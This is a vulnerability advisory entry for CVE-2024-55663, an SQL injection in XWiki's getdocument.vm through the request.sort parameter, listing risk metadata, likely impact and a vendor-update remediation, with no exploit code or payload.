#VU125589 SQL injection in XWiki platform - CVE-2024-55663
Published: December 12, 2024 / Updated: April 9, 2026
Vulnerability identifier: #VU125589
Vulnerability risk: High
CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/U:Amber
CVE-ID: CVE-2024-55663
CWE-ID: CWE-89
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vulnerable software:
XWiki platform
XWiki platform
Software vendor:
XWiki
XWiki
Description
The vulnerability allows a remote attacker to disclose sensitive information and modify database contents.
The vulnerability exists due to SQL injection in getdocument.vm when processing the request.sort parameter. A remote attacker can send a specially crafted request to disclose sensitive information and modify database contents.
Depending on the database backend, exploitation may allow access to confidential data such as password hashes and execution of UPDATE, INSERT, or DELETE queries.
Remediation
Install security update from vendor's website.